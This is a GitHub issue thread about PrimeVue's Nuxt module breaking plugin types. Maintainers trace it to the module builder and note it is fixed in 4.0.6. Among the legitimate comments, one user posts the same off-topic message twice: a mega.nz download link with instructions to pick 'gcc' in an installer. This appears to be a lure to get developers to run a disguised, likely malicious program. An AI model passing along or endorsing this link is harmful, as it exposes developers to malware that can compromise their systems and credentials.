### ISSUE TITLE
Nuxt plugin types break if I add @primevue/nuxt-module to modules

### ISSUE THREAD

**Issue by frasza** [primefaces/primevue#6289]
### Describe the bug

I have axios plugin that provides its instance to the app and in case I add @primevue/nuxt-module to the nuxt config modules array, the plugin type becomes unknown.

Might be same issue as with https://github.com/nuxt/nuxt/issues/28672 -- it was fixed with module-builder hotfix in https://github.com/nuxt-modules/i18n/pull/3071

### Reproducer

https://stackblitz.com/edit/github-htegss?file=nuxt.config.ts

### PrimeVue version

4.0.5

### Vue version

3.x

### Language

TypeScript

### Build / Runtime

Nuxt

**Comment by frasza** [comment]
cc: @danielroe 

Daniel, sorry for tagging you 🙏 Thought of you jumped on as it seems to be same issue as with i18n module that you PR fixed.

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by danielroe** [comment]
Yes, the module builder needs to be updated here also.

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by c0nd3v** [comment]
Also breaking my functions from ./utils

**Comment by c0nd3v** [comment]
This makes my functions from ./utils unable to be used in <template>. But I can still use the functions from ./utils in <script>

**Comment by danielroe** [comment]
Should be resolved by https://github.com/primefaces/primevue/pull/6207

**Comment by mertsincan** [comment]
Thanks a lot, @danielroe ;)

**Comment by m61x** [comment]
This issue can be closed as it was resolved with the release of version 4.0.6. Both #6336 and #6207 were merged into the main branch prior to the release. Therefore, @tugcekucukoglu does not need to adjust the milestones for this issue.
